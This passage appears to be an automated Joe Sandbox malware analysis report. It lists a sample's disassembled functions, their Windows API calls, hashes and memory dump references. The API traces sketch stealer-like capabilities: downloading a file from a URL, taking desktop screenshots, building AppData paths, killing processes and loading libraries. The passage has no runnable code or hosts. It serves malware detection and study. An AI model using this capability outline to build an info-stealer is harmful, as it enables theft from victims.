                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$AllocLocal
                          • String ID: ERROR
                          • API String ID: 1803462166-2861137601
                          • Opcode ID: 08d8cbd85322320b166094ad831deb1a1a288a3de0376aa2ca502e1777d05cb8
                          • Instruction ID: 4ca113b5d1e58b0e9627613e68970e4971ba029831edc8d9290b4c17fa4e5d25
                          • Opcode Fuzzy Hash: 08d8cbd85322320b166094ad831deb1a1a288a3de0376aa2ca502e1777d05cb8
                          • Instruction Fuzzy Hash: E151AF319502569BDB21AF78EC4DAAE7FB5BF82700F044079F9069B252DB74DC91CB90
                          Function 0051A010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                          Download Yara Rule
                          APIs
                          • GetEnvironmentVariableA.KERNEL32(011A89D0,00749BD8,0000FFFF), ref: 0051A026
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051A053
                          • lstrlen.KERNEL32(00749BD8), ref: 0051A060
                          • lstrcpy.KERNEL32(00000000,00749BD8), ref: 0051A08A
                          • lstrlen.KERNEL32(00544C4C), ref: 0051A095
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051A0B2
                          • lstrcat.KERNEL32(00000000,00544C4C), ref: 0051A0BE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051A0E4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051A0EF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051A114
                          • SetEnvironmentVariableA.KERNEL32(011A89D0,00000000), ref: 0051A12F
                          • LoadLibraryA.KERNEL32(011AD208), ref: 0051A143
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                          • String ID:
                          • API String ID: 2929475105-0
                          • Opcode ID: 62254d54fbf37f3d562736d767139c4f69f7f0159d42120df508d8158d81cd1d
                          • Instruction ID: 496cc5e0236b350fddc78fc95d9d7b7ec1c17676ccb963b6acf83db3cf240084
                          • Opcode Fuzzy Hash: 62254d54fbf37f3d562736d767139c4f69f7f0159d42120df508d8158d81cd1d
                          • Instruction Fuzzy Hash: 3691C3386016159FF7329FB4DC48AEA3BA6FB95704F40851AE51587251EFB9CDC0CB82
                          Function 0052C840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052C8A2
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052C8D1
                          • lstrlen.KERNEL32(00000000), ref: 0052C8FC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052C932
                          • StrCmpCA.SHLWAPI(00000000,00544C3C), ref: 0052C943
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: 06fd6e5273aa62bdb5d385e572ab8c4b10f09344fcb0c19f245fa590cb4d7eb2
                          • Instruction ID: eb8054a65608014ab9f7e3937dd3da0d52765d34ea634e90993f1c1721c722f9
                          • Opcode Fuzzy Hash: 06fd6e5273aa62bdb5d385e572ab8c4b10f09344fcb0c19f245fa590cb4d7eb2
                          • Instruction Fuzzy Hash: E561D471D0022A9BDB20EFB4DC89AEE7FB9BF46740F044565E841E7282D7789D858B90
                          Function 00534500 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 95memoryCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0053451A
                          • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00524F39), ref: 00534545
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0053454C
                          • wsprintfW.USER32 ref: 0053455B
                          • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 005345CA
                          • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 005345D9
                          • CloseHandle.KERNEL32(00000000,?,?), ref: 005345E0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                          • String ID: 9OR$%hs$9OR
                          • API String ID: 3729781310-3184690833
                          • Opcode ID: 1f6151b3bbb912a1bd4ce85896ca47694099dbc045aaa67eb3a752e75c36dd6d
                          • Instruction ID: c7326aa08cb10581263e137ded9aa4c1f2f4d2a4e35acda1a8b77ee1cb66bbfe
                          • Opcode Fuzzy Hash: 1f6151b3bbb912a1bd4ce85896ca47694099dbc045aaa67eb3a752e75c36dd6d
                          • Instruction Fuzzy Hash: D0317376A00209BBDB20DBE4DC49FDE7B78FF45700F104056FA05E7190EB746A458BAA
                          Function 005341E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                          Download Yara Rule
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00530CF0), ref: 00534276
                          • GetDesktopWindow.USER32 ref: 00534280
                          • GetWindowRect.USER32(00000000,?), ref: 0053428D
                          • SelectObject.GDI32(00000000,00000000), ref: 005342BF
                          • GetHGlobalFromStream.COMBASE(00530CF0,?), ref: 00534336
                          • GlobalLock.KERNEL32(?), ref: 00534340
                          • GlobalSize.KERNEL32(?), ref: 0053434D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                          • String ID:
                          • API String ID: 1264946473-0
                          • Opcode ID: 36393c5d9a70d5bc0ac995221b61d6ac44c09ba36d309b0ddfd8b30fce845be2
                          • Instruction ID: ab9bb3c0001609682297b0a7a77c07a78d5d8fe69f64fbebd96d266faeac2faa
                          • Opcode Fuzzy Hash: 36393c5d9a70d5bc0ac995221b61d6ac44c09ba36d309b0ddfd8b30fce845be2
                          • Instruction Fuzzy Hash: 2C511F75910209AFDB10DFA4DC89AEE7BB9FF89300F10451AFA05A3250DB74AD45CFA5
                          Function 0052DFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcat.KERNEL32(?,011ADF18), ref: 0052E00D
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0052E037
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052E06F
                          • lstrcat.KERNEL32(?,00000000), ref: 0052E07D
                          • lstrcat.KERNEL32(?,?), ref: 0052E098
                          • lstrcat.KERNEL32(?,?), ref: 0052E0AC
                          • lstrcat.KERNEL32(?,0119B248), ref: 0052E0C0
                          • lstrcat.KERNEL32(?,?), ref: 0052E0D4
                          • lstrcat.KERNEL32(?,011AD3E8), ref: 0052E0E7
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052E11F
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0052E126
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 4230089145-0
                          • Opcode ID: fc6e1d70a71aa919554ed70e1d01131a39fa3db0d93684cbecedeb0f3c99a7a6
                          • Instruction ID: 30e3c7513faac47e6c8b43a9196bca7a8ea4c911d9e89a2810ee110e03bafd92
                          • Opcode Fuzzy Hash: fc6e1d70a71aa919554ed70e1d01131a39fa3db0d93684cbecedeb0f3c99a7a6
                          • Instruction Fuzzy Hash: C261EF7591012CEBDB25DB64DC49ADEBBB5BF89300F1088A5E609A3290DB709FC5CF90
                          Function 00516AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00516AFF
                          • InternetOpenA.WININET(0053CFEC,00000001,00000000,00000000,00000000), ref: 00516B2C
                          • StrCmpCA.SHLWAPI(?,011AE4E8), ref: 00516B4A
                          • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00516B6A
                          • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00516B88
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00516BA1
                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00516BC6
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00516BF0
                          • CloseHandle.KERNEL32(00000000), ref: 00516C10
                          • InternetCloseHandle.WININET(00000000), ref: 00516C17
                          • InternetCloseHandle.WININET(?), ref: 00516C21
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                          • String ID:
                          • API String ID: 2500263513-0
                          • Opcode ID: 2e5417cb524a86c30feaad1561e76c980f32e23372cf2f78ec8bac2c02a23c31
                          • Instruction ID: 5375d04d0b5b3531f5937d412384fbf91921d0b5b9c7cfb2a4369a9fd42fcba6
                          • Opcode Fuzzy Hash: 2e5417cb524a86c30feaad1561e76c980f32e23372cf2f78ec8bac2c02a23c31
                          • Instruction Fuzzy Hash: 0E416275640209ABEB20DF64DC89FEE7B79FB44701F008555FA05E7190EF74AD848BA8
                          Function 0051BBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051BC1F
                          • lstrlen.KERNEL32(00000000), ref: 0051BC52
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051BC7C
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051BC84
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051BCAC
                          • lstrlen.KERNEL32(00544AD4), ref: 0051BD23
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID:
                          • API String ID: 2500673778-0
                          • Opcode ID: 557ae471f16619810a66ba83219ba1a413c0e99f49742ebd883d8100f89da596
                          • Instruction ID: 68b70c64b390c64a3f601e78e007170e0a36016f6d084fec72e80072d4e4c47f
                          • Opcode Fuzzy Hash: 557ae471f16619810a66ba83219ba1a413c0e99f49742ebd883d8100f89da596
                          • Instruction Fuzzy Hash: 91A14F34A012068FFB25DF68D949AEEBBB5BF85304F188069E405DB261DB36DCC1CB94
                          Function 00535EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                          Download Yara Rule
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00535F2A
                          • std::_Xinvalid_argument.LIBCPMT ref: 00535F49
                          • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00536014
                          • memmove.MSVCRT(00000000,00000000,?), ref: 0053609F
                          • std::_Xinvalid_argument.LIBCPMT ref: 005360D0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_$memmove
                          • String ID: invalid string position$string too long
                          • API String ID: 1975243496-4289949731
                          • Opcode ID: 4e8778b3e830a316d647cb49491d48ae7e91fea497a9b7f9ea63e7f3b5d02819
                          • Instruction ID: 5700b13d4666bdea0f017f1a1bed75bee4f2d0745cc430b037963eda37f8264c
                          • Opcode Fuzzy Hash: 4e8778b3e830a316d647cb49491d48ae7e91fea497a9b7f9ea63e7f3b5d02819
                          • Instruction Fuzzy Hash: DE615E70700544EBDB18CF5CC8D996EBBB6FB84304F248A5DE5928B782E731AD80CB95
                          Function 0052E049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052E06F
                          • lstrcat.KERNEL32(?,00000000), ref: 0052E07D
                          • lstrcat.KERNEL32(?,?), ref: 0052E098
                          • lstrcat.KERNEL32(?,?), ref: 0052E0AC
                          • lstrcat.KERNEL32(?,0119B248), ref: 0052E0C0
                          • lstrcat.KERNEL32(?,?), ref: 0052E0D4
                          • lstrcat.KERNEL32(?,011AD3E8), ref: 0052E0E7
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052E11F
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0052E126
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$AttributesFile
                          • String ID:
                          • API String ID: 3428472996-0
                          • Opcode ID: 276dde4b8c15494591fc689b33572d4965a158ea0a9d1191b19430beb053de69
                          • Instruction ID: f1aca8f014980d48329c1cde5c074fd812248d26c38bc4af7563536f47de6a7e
                          • Opcode Fuzzy Hash: 276dde4b8c15494591fc689b33572d4965a158ea0a9d1191b19430beb053de69
                          • Instruction Fuzzy Hash: 6841EE7191012D9BDB25EB64EC49ADE7BB4BF89300F0089A5FA0A93250DB749FD5CF90
                          Function 00517A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                          Download Yara Rule
                          APIs
